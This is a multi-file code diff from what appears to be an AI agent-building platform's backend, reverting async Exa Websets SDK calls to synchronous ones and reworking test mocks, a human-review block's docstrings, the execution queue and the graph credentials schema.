aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
webset = await aexa.websets.get(id=input_data.webset_id)
webset = aexa.websets.get(id=input_data.webset_id)
status = (
webset.status.value
@@ -1185,7 +1185,7 @@ class ExaWebsetSummaryBlock(Block):
) -> BlockOutput:
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
webset = await aexa.websets.get(id=input_data.webset_id)
webset = aexa.websets.get(id=input_data.webset_id)
# Extract basic info
webset_id = webset.id
@@ -1211,7 +1211,7 @@ class ExaWebsetSummaryBlock(Block):
total_items = 0
if input_data.include_sample_items and input_data.sample_size > 0:
items_response = await aexa.websets.items.list(
items_response = aexa.websets.items.list(
webset_id=input_data.webset_id, limit=input_data.sample_size
)
sample_items_data = [
@@ -1362,7 +1362,7 @@ class ExaWebsetReadyCheckBlock(Block):
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
# Get webset details
webset = await aexa.websets.get(id=input_data.webset_id)
webset = aexa.websets.get(id=input_data.webset_id)
status = (
webset.status.value

View File

@@ -202,7 +202,7 @@ class ExaCreateEnrichmentBlock(Block):
# Use AsyncExa SDK
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
sdk_enrichment = await aexa.websets.enrichments.create(
sdk_enrichment = aexa.websets.enrichments.create(
webset_id=input_data.webset_id, params=payload
)
@@ -223,7 +223,7 @@ class ExaCreateEnrichmentBlock(Block):
items_enriched = 0
while time.time() - poll_start < input_data.polling_timeout:
current_enrich = await aexa.websets.enrichments.get(
current_enrich = aexa.websets.enrichments.get(
webset_id=input_data.webset_id, id=enrichment_id
)
current_status = (
@@ -234,7 +234,7 @@ class ExaCreateEnrichmentBlock(Block):
if current_status in ["completed", "failed", "cancelled"]:
# Estimate items from webset searches
webset = await aexa.websets.get(id=input_data.webset_id)
webset = aexa.websets.get(id=input_data.webset_id)
if webset.searches:
for search in webset.searches:
if search.progress:
@@ -329,7 +329,7 @@ class ExaGetEnrichmentBlock(Block):
# Use AsyncExa SDK
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
sdk_enrichment = await aexa.websets.enrichments.get(
sdk_enrichment = aexa.websets.enrichments.get(
webset_id=input_data.webset_id, id=input_data.enrichment_id
)
@@ -474,7 +474,7 @@ class ExaDeleteEnrichmentBlock(Block):
# Use AsyncExa SDK
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
deleted_enrichment = await aexa.websets.enrichments.delete(
deleted_enrichment = aexa.websets.enrichments.delete(
webset_id=input_data.webset_id, id=input_data.enrichment_id
)
@@ -525,13 +525,13 @@ class ExaCancelEnrichmentBlock(Block):
# Use AsyncExa SDK
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
canceled_enrichment = await aexa.websets.enrichments.cancel(
canceled_enrichment = aexa.websets.enrichments.cancel(
webset_id=input_data.webset_id, id=input_data.enrichment_id
)
# Try to estimate how many items were enriched before cancellation
items_enriched = 0
items_response = await aexa.websets.items.list(
items_response = aexa.websets.items.list(
webset_id=input_data.webset_id, limit=100
)

View File

@@ -222,7 +222,7 @@ class ExaCreateImportBlock(Block):
def _create_test_mock():
"""Create test mocks for the AsyncExa SDK."""
from datetime import datetime
from unittest.mock import AsyncMock, MagicMock
from unittest.mock import MagicMock
# Create mock SDK import object
mock_import = MagicMock()
@@ -247,7 +247,7 @@ class ExaCreateImportBlock(Block):
return {
"_get_client": lambda *args, **kwargs: MagicMock(
websets=MagicMock(
imports=MagicMock(create=AsyncMock(return_value=mock_import))
imports=MagicMock(create=lambda *args, **kwargs: mock_import)
)
)
}
@@ -294,7 +294,7 @@ class ExaCreateImportBlock(Block):
if input_data.metadata:
payload["metadata"] = input_data.metadata
sdk_import = await aexa.websets.imports.create(
sdk_import = aexa.websets.imports.create(
params=payload, csv_data=input_data.csv_data
)
@@ -360,7 +360,7 @@ class ExaGetImportBlock(Block):
# Use AsyncExa SDK
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
sdk_import = await aexa.websets.imports.get(import_id=input_data.import_id)
sdk_import = aexa.websets.imports.get(import_id=input_data.import_id)
import_obj = ImportModel.from_sdk(sdk_import)
@@ -426,7 +426,7 @@ class ExaListImportsBlock(Block):
# Use AsyncExa SDK
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
response = await aexa.websets.imports.list(
response = aexa.websets.imports.list(
cursor=input_data.cursor,
limit=input_data.limit,
)
@@ -474,9 +474,7 @@ class ExaDeleteImportBlock(Block):
# Use AsyncExa SDK
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
deleted_import = await aexa.websets.imports.delete(
import_id=input_data.import_id
)
deleted_import = aexa.websets.imports.delete(import_id=input_data.import_id)
yield "import_id", deleted_import.id
yield "success", "true"
@@ -575,14 +573,14 @@ class ExaExportWebsetBlock(Block):
}
)
# Create async iterator for list_all
async def async_item_iterator(*args, **kwargs):
for item in [mock_item1, mock_item2]:
yield item
# Create mock iterator
mock_items = [mock_item1, mock_item2]
return {
"_get_client": lambda *args, **kwargs: MagicMock(
websets=MagicMock(items=MagicMock(list_all=async_item_iterator))
websets=MagicMock(
items=MagicMock(list_all=lambda *args, **kwargs: iter(mock_items))
)
)
}
@@ -604,7 +602,7 @@ class ExaExportWebsetBlock(Block):
webset_id=input_data.webset_id, limit=input_data.max_items
)
async for sdk_item in item_iterator:
for sdk_item in item_iterator:
if len(all_items) >= input_data.max_items:
break

View File

@@ -178,7 +178,7 @@ class ExaGetWebsetItemBlock(Block):
) -> BlockOutput:
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
sdk_item = await aexa.websets.items.get(
sdk_item = aexa.websets.items.get(
webset_id=input_data.webset_id, id=input_data.item_id
)
@@ -269,7 +269,7 @@ class ExaListWebsetItemsBlock(Block):
response = None
while time.time() - start_time < input_data.wait_timeout:
response = await aexa.websets.items.list(
response = aexa.websets.items.list(
webset_id=input_data.webset_id,
cursor=input_data.cursor,
limit=input_data.limit,
@@ -282,13 +282,13 @@ class ExaListWebsetItemsBlock(Block):
interval = min(interval * 1.2, 10)
if not response:
response = await aexa.websets.items.list(
response = aexa.websets.items.list(
webset_id=input_data.webset_id,
cursor=input_data.cursor,
limit=input_data.limit,
)
else:
response = await aexa.websets.items.list(
response = aexa.websets.items.list(
webset_id=input_data.webset_id,
cursor=input_data.cursor,
limit=input_data.limit,
@@ -340,7 +340,7 @@ class ExaDeleteWebsetItemBlock(Block):
) -> BlockOutput:
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
deleted_item = await aexa.websets.items.delete(
deleted_item = aexa.websets.items.delete(
webset_id=input_data.webset_id, id=input_data.item_id
)
@@ -408,7 +408,7 @@ class ExaBulkWebsetItemsBlock(Block):
webset_id=input_data.webset_id, limit=input_data.max_items
)
async for sdk_item in item_iterator:
for sdk_item in item_iterator:
if len(all_items) >= input_data.max_items:
break
@@ -475,7 +475,7 @@ class ExaWebsetItemsSummaryBlock(Block):
# Use AsyncExa SDK
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
webset = await aexa.websets.get(id=input_data.webset_id)
webset = aexa.websets.get(id=input_data.webset_id)
entity_type = "unknown"
if webset.searches:
@@ -495,7 +495,7 @@ class ExaWebsetItemsSummaryBlock(Block):
# Get sample items if requested
sample_items: List[WebsetItemModel] = []
if input_data.sample_size > 0:
items_response = await aexa.websets.items.list(
items_response = aexa.websets.items.list(
webset_id=input_data.webset_id, limit=input_data.sample_size
)
# Convert to our stable models
@@ -569,7 +569,7 @@ class ExaGetNewItemsBlock(Block):
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
# Get items starting from cursor
response = await aexa.websets.items.list(
response = aexa.websets.items.list(
webset_id=input_data.webset_id,
cursor=input_data.since_cursor,
limit=input_data.max_items,

View File

@@ -233,7 +233,7 @@ class ExaCreateMonitorBlock(Block):
def _create_test_mock():
"""Create test mocks for the AsyncExa SDK."""
from datetime import datetime
from unittest.mock import AsyncMock, MagicMock
from unittest.mock import MagicMock
# Create mock SDK monitor object
mock_monitor = MagicMock()
@@ -263,7 +263,7 @@ class ExaCreateMonitorBlock(Block):
return {
"_get_client": lambda *args, **kwargs: MagicMock(
websets=MagicMock(
monitors=MagicMock(create=AsyncMock(return_value=mock_monitor))
monitors=MagicMock(create=lambda *args, **kwargs: mock_monitor)
)
)
}
@@ -320,7 +320,7 @@ class ExaCreateMonitorBlock(Block):
if input_data.metadata:
payload["metadata"] = input_data.metadata
sdk_monitor = await aexa.websets.monitors.create(params=payload)
sdk_monitor = aexa.websets.monitors.create(params=payload)
monitor = MonitorModel.from_sdk(sdk_monitor)
@@ -384,7 +384,7 @@ class ExaGetMonitorBlock(Block):
# Use AsyncExa SDK
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
sdk_monitor = await aexa.websets.monitors.get(monitor_id=input_data.monitor_id)
sdk_monitor = aexa.websets.monitors.get(monitor_id=input_data.monitor_id)
monitor = MonitorModel.from_sdk(sdk_monitor)
@@ -476,7 +476,7 @@ class ExaUpdateMonitorBlock(Block):
if input_data.metadata is not None:
payload["metadata"] = input_data.metadata
sdk_monitor = await aexa.websets.monitors.update(
sdk_monitor = aexa.websets.monitors.update(
monitor_id=input_data.monitor_id, params=payload
)
@@ -522,9 +522,7 @@ class ExaDeleteMonitorBlock(Block):
# Use AsyncExa SDK
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
deleted_monitor = await aexa.websets.monitors.delete(
monitor_id=input_data.monitor_id
)
deleted_monitor = aexa.websets.monitors.delete(monitor_id=input_data.monitor_id)
yield "monitor_id", deleted_monitor.id
yield "success", "true"
@@ -581,7 +579,7 @@ class ExaListMonitorsBlock(Block):
# Use AsyncExa SDK
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
response = await aexa.websets.monitors.list(
response = aexa.websets.monitors.list(
cursor=input_data.cursor,
limit=input_data.limit,
webset_id=input_data.webset_id,

View File

@@ -121,7 +121,7 @@ class ExaWaitForWebsetBlock(Block):
WebsetTargetStatus.IDLE,
WebsetTargetStatus.ANY_COMPLETE,
]:
final_webset = await aexa.websets.wait_until_idle(
final_webset = aexa.websets.wait_until_idle(
id=input_data.webset_id,
timeout=input_data.timeout,
poll_interval=input_data.check_interval,
@@ -164,7 +164,7 @@ class ExaWaitForWebsetBlock(Block):
interval = input_data.check_interval
while time.time() - start_time < input_data.timeout:
# Get current webset status
webset = await aexa.websets.get(id=input_data.webset_id)
webset = aexa.websets.get(id=input_data.webset_id)
current_status = (
webset.status.value
if hasattr(webset.status, "value")
@@ -209,7 +209,7 @@ class ExaWaitForWebsetBlock(Block):
# Timeout reached
elapsed = time.time() - start_time
webset = await aexa.websets.get(id=input_data.webset_id)
webset = aexa.websets.get(id=input_data.webset_id)
final_status = (
webset.status.value
if hasattr(webset.status, "value")
@@ -345,7 +345,7 @@ class ExaWaitForSearchBlock(Block):
try:
while time.time() - start_time < input_data.timeout:
# Get current search status using SDK
search = await aexa.websets.searches.get(
search = aexa.websets.searches.get(
webset_id=input_data.webset_id, id=input_data.search_id
)
@@ -401,7 +401,7 @@ class ExaWaitForSearchBlock(Block):
elapsed = time.time() - start_time
# Get last known status
search = await aexa.websets.searches.get(
search = aexa.websets.searches.get(
webset_id=input_data.webset_id, id=input_data.search_id
)
final_status = (
@@ -503,7 +503,7 @@ class ExaWaitForEnrichmentBlock(Block):
try:
while time.time() - start_time < input_data.timeout:
# Get current enrichment status using SDK
enrichment = await aexa.websets.enrichments.get(
enrichment = aexa.websets.enrichments.get(
webset_id=input_data.webset_id, id=input_data.enrichment_id
)
@@ -548,7 +548,7 @@ class ExaWaitForEnrichmentBlock(Block):
elapsed = time.time() - start_time
# Get last known status
enrichment = await aexa.websets.enrichments.get(
enrichment = aexa.websets.enrichments.get(
webset_id=input_data.webset_id, id=input_data.enrichment_id
)
final_status = (
@@ -575,7 +575,7 @@ class ExaWaitForEnrichmentBlock(Block):
) -> tuple[list[SampleEnrichmentModel], int]:
"""Get sample enriched data and count."""
# Get a few items to see enrichment results using SDK
response = await aexa.websets.items.list(webset_id=webset_id, limit=5)
response = aexa.websets.items.list(webset_id=webset_id, limit=5)
sample_data: list[SampleEnrichmentModel] = []
enriched_count = 0

View File

@@ -317,7 +317,7 @@ class ExaCreateWebsetSearchBlock(Block):
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
sdk_search = await aexa.websets.searches.create(
sdk_search = aexa.websets.searches.create(
webset_id=input_data.webset_id, params=payload
)
@@ -350,7 +350,7 @@ class ExaCreateWebsetSearchBlock(Block):
poll_start = time.time()
while time.time() - poll_start < input_data.polling_timeout:
current_search = await aexa.websets.searches.get(
current_search = aexa.websets.searches.get(
webset_id=input_data.webset_id, id=search_id
)
current_status = (
@@ -442,7 +442,7 @@ class ExaGetWebsetSearchBlock(Block):
# Use AsyncExa SDK
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
sdk_search = await aexa.websets.searches.get(
sdk_search = aexa.websets.searches.get(
webset_id=input_data.webset_id, id=input_data.search_id
)
@@ -523,7 +523,7 @@ class ExaCancelWebsetSearchBlock(Block):
# Use AsyncExa SDK
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
canceled_search = await aexa.websets.searches.cancel(
canceled_search = aexa.websets.searches.cancel(
webset_id=input_data.webset_id, id=input_data.search_id
)
@@ -604,7 +604,7 @@ class ExaFindOrCreateSearchBlock(Block):
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
# Get webset to check existing searches
webset = await aexa.websets.get(id=input_data.webset_id)
webset = aexa.websets.get(id=input_data.webset_id)
# Look for existing search with same query
existing_search = None
@@ -636,7 +636,7 @@ class ExaFindOrCreateSearchBlock(Block):
if input_data.entity_type != SearchEntityType.AUTO:
payload["entity"] = {"type": input_data.entity_type.value}
sdk_search = await aexa.websets.searches.create(
sdk_search = aexa.websets.searches.create(
webset_id=input_data.webset_id, params=payload
)

View File

@@ -21,71 +21,43 @@ logger = logging.getLogger(__name__)
class HumanInTheLoopBlock(Block):
"""
Pauses execution and waits for human approval or rejection of the data.
This block pauses execution and waits for human approval or modification of the data.
When executed, this block creates a pending review entry and sets the node execution
status to REVIEW. The execution remains paused until a human user either approves
or rejects the data.
When executed, it creates a pending review entry and sets the node execution status
to REVIEW. The execution will remain paused until a human user either:
- Approves the data (with or without modifications)
- Rejects the data
**How it works:**
- The input data is presented to a human reviewer
- The reviewer can approve or reject (and optionally modify the data if editable)
- On approval: the data flows out through the `approved_data` output pin
- On rejection: the data flows out through the `rejected_data` output pin
**Important:** The output pins yield the actual data itself, NOT status strings.
The approval/rejection decision determines WHICH output pin fires, not the value.
You do NOT need to compare the output to "APPROVED" or "REJECTED" - simply connect
downstream blocks to the appropriate output pin for each case.
**Example usage:**
- Connect `approved_data` → next step in your workflow (data was approved)
- Connect `rejected_data` → error handling or notification (data was rejected)
This is useful for workflows that require human validation or intervention before
proceeding to the next steps.
"""
class Input(BlockSchemaInput):
data: Any = SchemaField(
description="The data to be reviewed by a human user. "
"This exact data will be passed through to either approved_data or "
"rejected_data output based on the reviewer's decision."
)
data: Any = SchemaField(description="The data to be reviewed by a human user")
name: str = SchemaField(
description="A descriptive name for what this data represents. "
"This helps the reviewer understand what they are reviewing.",
description="A descriptive name for what this data represents",
)
editable: bool = SchemaField(
description="Whether the human reviewer can edit the data before "
"approving or rejecting it",
description="Whether the human reviewer can edit the data",
default=True,
advanced=True,
)
class Output(BlockSchemaOutput):
approved_data: Any = SchemaField(
description="Outputs the input data when the reviewer APPROVES it. "
"The value is the actual data itself (not a status string like 'APPROVED'). "
"If the reviewer edited the data, this contains the modified version. "
"Connect downstream blocks here for the 'approved' workflow path."
description="The data when approved (may be modified by reviewer)"
)
rejected_data: Any = SchemaField(
description="Outputs the input data when the reviewer REJECTS it. "
"The value is the actual data itself (not a status string like 'REJECTED'). "
"If the reviewer edited the data, this contains the modified version. "
"Connect downstream blocks here for the 'rejected' workflow path."
description="The data when rejected (may be modified by reviewer)"
)
review_message: str = SchemaField(
description="Optional message provided by the reviewer explaining their "
"decision. Only outputs when the reviewer provides a message; "
"this pin does not fire if no message was given.",
default="",
description="Any message provided by the reviewer", default=""
)
def __init__(self):
super().__init__(
id="8b2a7b3c-6e9d-4a5f-8c1b-2e3f4a5b6c7d",
description="Pause execution for human review. Data flows through "
"approved_data or rejected_data output based on the reviewer's decision. "
"Outputs contain the actual data, not status strings.",
description="Pause execution and wait for human approval or modification of data",
categories={BlockCategory.BASIC},
input_schema=HumanInTheLoopBlock.Input,
output_schema=HumanInTheLoopBlock.Output,

View File

@@ -531,12 +531,12 @@ class LLMResponse(BaseModel):
def convert_openai_tool_fmt_to_anthropic(
openai_tools: list[dict] | None = None,
) -> Iterable[ToolParam] | anthropic.Omit:
) -> Iterable[ToolParam] | anthropic.NotGiven:
"""
Convert OpenAI tool format to Anthropic tool format.
"""
if not openai_tools or len(openai_tools) == 0:
return anthropic.omit
return anthropic.NOT_GIVEN
anthropic_tools = []
for tool in openai_tools:
@@ -596,10 +596,10 @@ def extract_openai_tool_calls(response) -> list[ToolContentBlock] | None:
def get_parallel_tool_calls_param(
llm_model: LlmModel, parallel_tool_calls: bool | None
) -> bool | openai.Omit:
):
"""Get the appropriate parallel_tool_calls parameter for OpenAI-compatible APIs."""
if llm_model.startswith("o") or parallel_tool_calls is None:
return openai.omit
return openai.NOT_GIVEN
return parallel_tool_calls

View File

@@ -246,9 +246,7 @@ class BlockSchema(BaseModel):
f"is not of type {CredentialsMetaInput.__name__}"
)
CredentialsMetaInput.validate_credentials_field_schema(
cls.get_field_schema(field_name), field_name
)
credentials_fields[field_name].validate_credentials_field_schema(cls)
elif field_name in credentials_fields:
raise KeyError(

View File

@@ -1,8 +1,9 @@
import logging
import queue
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from enum import Enum
from multiprocessing import Manager
from queue import Empty
from typing import (
TYPE_CHECKING,
Annotated,
@@ -1199,16 +1200,12 @@ class NodeExecutionEntry(BaseModel):
class ExecutionQueue(Generic[T]):
"""
Thread-safe queue for managing node execution within a single graph execution.
Note: Uses queue.Queue (not multiprocessing.Queue) since all access is from
threads within the same process. If migrating back to ProcessPoolExecutor,
replace with multiprocessing.Manager().Queue() for cross-process safety.
Queue for managing the execution of agents.
This will be shared between different processes
"""
def __init__(self):
# Thread-safe queue (not multiprocessing) — see class docstring
self.queue: queue.Queue[T] = queue.Queue()
self.queue = Manager().Queue()
def add(self, execution: T) -> T:
self.queue.put(execution)
@@ -1223,7 +1220,7 @@ class ExecutionQueue(Generic[T]):
def get_or_none(self) -> T | None:
try:
return self.queue.get_nowait()
except queue.Empty:
except Empty:
return None

View File

@@ -1,58 +0,0 @@
"""Tests for ExecutionQueue thread-safety."""
import queue
import threading
from backend.data.execution import ExecutionQueue
def test_execution_queue_uses_stdlib_queue():
"""Verify ExecutionQueue uses queue.Queue (not multiprocessing)."""
q = ExecutionQueue()
assert isinstance(q.queue, queue.Queue)
def test_basic_operations():
"""Test add, get, empty, and get_or_none."""
q = ExecutionQueue()
assert q.empty() is True
assert q.get_or_none() is None
result = q.add("item1")
assert result == "item1"
assert q.empty() is False
item = q.get()
assert item == "item1"
assert q.empty() is True
def test_thread_safety():
"""Test concurrent access from multiple threads."""
q = ExecutionQueue()
results = []
num_items = 100
def producer():
for i in range(num_items):
q.add(f"item_{i}")
def consumer():
count = 0
while count < num_items:
item = q.get_or_none()
if item is not None:
results.append(item)
count += 1
producer_thread = threading.Thread(target=producer)
consumer_thread = threading.Thread(target=consumer)
producer_thread.start()
consumer_thread.start()
producer_thread.join(timeout=5)
consumer_thread.join(timeout=5)
assert len(results) == num_items

View File

@@ -3,7 +3,7 @@ import logging
import uuid
from collections import defaultdict
from datetime import datetime, timezone
from typing import TYPE_CHECKING, Annotated, Any, Literal, Optional, Self, cast
from typing import TYPE_CHECKING, Annotated, Any, Literal, Optional, cast
from prisma.enums import SubmissionStatus
from prisma.models import (
@@ -20,7 +20,7 @@ from prisma.types import (
AgentNodeLinkCreateInput,
StoreListingVersionWhereInput,
)
from pydantic import BaseModel, BeforeValidator, Field
from pydantic import BaseModel, BeforeValidator, Field, create_model
from pydantic.fields import computed_field
from backend.blocks.agent import AgentExecutorBlock
@@ -30,6 +30,7 @@ from backend.data.db import prisma as db
from backend.data.dynamic_fields import is_tool_pin, sanitize_pin_name
from backend.data.includes import MAX_GRAPH_VERSIONS_FETCH
from backend.data.model import (
CredentialsField,
CredentialsFieldInfo,
CredentialsMetaInput,
is_credentials_field_name,
@@ -44,6 +45,7 @@ from .block import (
AnyBlockSchema,
Block,
BlockInput,
BlockSchema,
BlockType,
EmptySchema,
get_block,
@@ -111,12 +113,10 @@ class Link(BaseDbModel):
class Node(BaseDbModel):
block_id: str
input_default: BlockInput = Field( # dict[input_name, default_value]
default_factory=dict
)
metadata: dict[str, Any] = Field(default_factory=dict)
input_links: list[Link] = Field(default_factory=list)
output_links: list[Link] = Field(default_factory=list)
input_default: BlockInput = {} # dict[input_name, default_value]
metadata: dict[str, Any] = {}
input_links: list[Link] = []
output_links: list[Link] = []
@property
def credentials_optional(self) -> bool:
@@ -221,33 +221,18 @@ class NodeModel(Node):
return result
class GraphBaseMeta(BaseDbModel):
"""
Shared base for `GraphMeta` and `BaseGraph`, with core graph metadata fields.
"""
class BaseGraph(BaseDbModel):
version: int = 1
is_active: bool = True
name: str
description: str
instructions: str | None = None
recommended_schedule_cron: str | None = None
nodes: list[Node] = []
links: list[Link] = []
forked_from_id: str | None = None
forked_from_version: int | None = None
class BaseGraph(GraphBaseMeta):
"""
Graph with nodes, links, and computed I/O schema fields.
Used to represent sub-graphs within a `Graph`. Contains the full graph
structure including nodes and links, plus computed fields for schemas
and trigger info. Does NOT include user_id or created_at (see GraphModel).
"""
nodes: list[Node] = Field(default_factory=list)
links: list[Link] = Field(default_factory=list)
@computed_field
@property
def input_schema(self) -> dict[str, Any]:
@@ -376,79 +361,44 @@ class GraphTriggerInfo(BaseModel):
class Graph(BaseGraph):
"""Creatable graph model used in API create/update endpoints."""
sub_graphs: list[BaseGraph] = Field(default_factory=list) # Flattened sub-graphs
class GraphMeta(GraphBaseMeta):
"""
Lightweight graph metadata model representing an existing graph from the database,
for use in listings and summaries.
Lacks `GraphModel`'s nodes, links, and expensive computed fields.
Use for list endpoints where full graph data is not needed and performance matters.
"""
id: str # type: ignore
version: int # type: ignore
user_id: str
created_at: datetime
@classmethod
def from_db(cls, graph: "AgentGraph") -> Self:
return cls(
id=graph.id,
version=graph.version,
is_active=graph.isActive,
name=graph.name or "",
description=graph.description or "",
instructions=graph.instructions,
recommended_schedule_cron=graph.recommendedScheduleCron,
forked_from_id=graph.forkedFromId,
forked_from_version=graph.forkedFromVersion,
user_id=graph.userId,
created_at=graph.createdAt,
)
class GraphModel(Graph, GraphMeta):
"""
Full graph model representing an existing graph from the database.
This is the primary model for working with persisted graphs. Includes all
graph data (nodes, links, sub_graphs) plus user ownership and timestamps.
Provides computed fields (input_schema, output_schema, etc.) used during
set-up (frontend) and execution (backend).
Inherits from:
- `Graph`: provides structure (nodes, links, sub_graphs) and computed schemas
- `GraphMeta`: provides user_id, created_at for database records
"""
nodes: list[NodeModel] = Field(default_factory=list) # type: ignore
@property
def starting_nodes(self) -> list[NodeModel]:
outbound_nodes = {link.sink_id for link in self.links}
input_nodes = {
node.id for node in self.nodes if node.block.block_type == BlockType.INPUT
}
return [
node
for node in self.nodes
if node.id not in outbound_nodes or node.id in input_nodes
]
@property
def webhook_input_node(self) -> NodeModel | None: # type: ignore
return cast(NodeModel, super().webhook_input_node)
sub_graphs: list[BaseGraph] = [] # Flattened sub-graphs
@computed_field
@property
def credentials_input_schema(self) -> dict[str, Any]:
graph_credentials_inputs = self.aggregate_credentials_inputs()
schema = self._credentials_input_schema.jsonschema()
# Determine which credential fields are required based on credentials_optional metadata
graph_credentials_inputs = self.aggregate_credentials_inputs()
required_fields = []
# Build a map of node_id -> node for quick lookup
all_nodes = {node.id: node for node in self.nodes}
for sub_graph in self.sub_graphs:
for node in sub_graph.nodes:
all_nodes[node.id] = node
for field_key, (
_field_info,
node_field_pairs,
) in graph_credentials_inputs.items():
# A field is required if ANY node using it has credentials_optional=False
is_required = False
for node_id, _field_name in node_field_pairs:
node = all_nodes.get(node_id)
if node and not node.credentials_optional:
is_required = True
break
if is_required:
required_fields.append(field_key)
schema["required"] = required_fields
return schema
@property
def _credentials_input_schema(self) -> type[BlockSchema]:
graph_credentials_inputs = self.aggregate_credentials_inputs()
logger.debug(
f"Combined credentials input fields for graph #{self.id} ({self.name}): "
f"{graph_credentials_inputs}"
@@ -456,8 +406,8 @@ class GraphModel(Graph, GraphMeta):
# Warn if same-provider credentials inputs can't be combined (= bad UX)
graph_cred_fields = list(graph_credentials_inputs.values())
for i, (field, keys, _) in enumerate(graph_cred_fields):
for other_field, other_keys, _ in list(graph_cred_fields)[i + 1 :]:
for i, (field, keys) in enumerate(graph_cred_fields):
for other_field, other_keys in list(graph_cred_fields)[i + 1 :]:
if field.provider != other_field.provider:
continue
if ProviderName.HTTP in field.provider:
@@ -473,78 +423,31 @@ class GraphModel(Graph, GraphMeta):
f"keys: {keys} <> {other_keys}."
)
# Build JSON schema directly to avoid expensive create_model + validation overhead
properties = {}
required_fields = []
for agg_field_key, (
field_info,
_,
is_required,
) in graph_credentials_inputs.items():
providers = list(field_info.provider)
cred_types = list(field_info.supported_types)
field_schema: dict[str, Any] = {
"credentials_provider": providers,
"credentials_types": cred_types,
"type": "object",
"properties": {
"id": {"title": "Id", "type": "string"},
"title": {
"anyOf": [{"type": "string"}, {"type": "null"}],
"default": None,
"title": "Title",
},
"provider": {
"title": "Provider",
"type": "string",
**(
{"enum": providers}
if len(providers) > 1
else {"const": providers[0]}
),
},
"type": {
"title": "Type",
"type": "string",
**(
{"enum": cred_types}
if len(cred_types) > 1
else {"const": cred_types[0]}
),
},
},
"required": ["id", "provider", "type"],
}
# Add other (optional) field info items
field_schema.update(
field_info.model_dump(
by_alias=True,
exclude_defaults=True,
exclude={"provider", "supported_types"}, # already included above
)
fields: dict[str, tuple[type[CredentialsMetaInput], CredentialsMetaInput]] = {
agg_field_key: (
CredentialsMetaInput[
Literal[tuple(field_info.provider)], # type: ignore
Literal[tuple(field_info.supported_types)], # type: ignore
],
CredentialsField(
required_scopes=set(field_info.required_scopes or []),
discriminator=field_info.discriminator,
discriminator_mapping=field_info.discriminator_mapping,
discriminator_values=field_info.discriminator_values,
),
)
# Ensure field schema is well-formed
CredentialsMetaInput.validate_credentials_field_schema(
field_schema, agg_field_key
)
properties[agg_field_key] = field_schema
if is_required:
required_fields.append(agg_field_key)
return {
"type": "object",
"properties": properties,
"required": required_fields,
for agg_field_key, (field_info, _) in graph_credentials_inputs.items()
}
return create_model(
self.name.replace(" ", "") + "CredentialsInputSchema",
__base__=BlockSchema,
**fields, # type: ignore
)
def aggregate_credentials_inputs(
self,
) -> dict[str, tuple[CredentialsFieldInfo, set[tuple[str, str]], bool]]:
) -> dict[str, tuple[CredentialsFieldInfo, set[tuple[str, str]]]]:
"""
Returns:
dict[aggregated_field_key, tuple(
@@ -552,19 +455,13 @@ class GraphModel(Graph, GraphMeta):
(now includes discriminator_values from matching nodes)
set[(node_id, field_name)]: Node credentials fields that are
compatible with this aggregated field spec
bool: True if the field is required (any node has credentials_optional=False)
)]
"""
# First collect all credential field data with input defaults
# Track (field_info, (node_id, field_name), is_required) for each credential field
node_credential_data: list[tuple[CredentialsFieldInfo, tuple[str, str]]] = []
node_required_map: dict[str, bool] = {} # node_id -> is_required
node_credential_data = []
for graph in [self] + self.sub_graphs:
for node in graph.nodes:
# Track if this node requires credentials (credentials_optional=False means required)
node_required_map[node.id] = not node.credentials_optional
for (
field_name,
field_info,
@@ -588,21 +485,37 @@ class GraphModel(Graph, GraphMeta):
)
# Combine credential field info (this will merge discriminator_values automatically)
combined = CredentialsFieldInfo.combine(*node_credential_data)
return CredentialsFieldInfo.combine(*node_credential_data)
# Add is_required flag to each aggregated field
# A field is required if ANY node using it has credentials_optional=False
return {
key: (
field_info,
node_field_pairs,
any(
node_required_map.get(node_id, True)
for node_id, _ in node_field_pairs
),
)
for key, (field_info, node_field_pairs) in combined.items()
class GraphModel(Graph):
user_id: str
nodes: list[NodeModel] = [] # type: ignore
created_at: datetime
@property
def starting_nodes(self) -> list[NodeModel]:
outbound_nodes = {link.sink_id for link in self.links}
input_nodes = {
node.id for node in self.nodes if node.block.block_type == BlockType.INPUT
}
return [
node
for node in self.nodes
if node.id not in outbound_nodes or node.id in input_nodes
]
@property
def webhook_input_node(self) -> NodeModel | None: # type: ignore
return cast(NodeModel, super().webhook_input_node)
def meta(self) -> "GraphMeta":
"""
Returns a GraphMeta object with metadata about the graph.
This is used to return metadata about the graph without exposing nodes and links.
"""
return GraphMeta.from_graph(self)
def reassign_ids(self, user_id: str, reassign_graph_id: bool = False):
"""
@@ -743,11 +656,6 @@ class GraphModel(Graph, GraphMeta):
# For invalid blocks, we still raise immediately as this is a structural issue
raise ValueError(f"Invalid block {node.block_id} for node #{node.id}")
if block.disabled:
raise ValueError(
f"Block {node.block_id} is disabled and cannot be used in graphs"
)
node_input_mask = (
nodes_input_masks.get(node.id, {}) if nodes_input_masks else {}
)
@@ -891,14 +799,13 @@ class GraphModel(Graph, GraphMeta):
if is_static_output_block(link.source_id):
link.is_static = True # Each value block output should be static.
@classmethod
def from_db( # type: ignore[reportIncompatibleMethodOverride]
cls,
@staticmethod
def from_db(
graph: AgentGraph,
for_export: bool = False,
sub_graphs: list[AgentGraph] | None = None,
) -> Self:
return cls(
) -> "GraphModel":
return GraphModel(
id=graph.id,
user_id=graph.userId if not for_export else "",
version=graph.version,
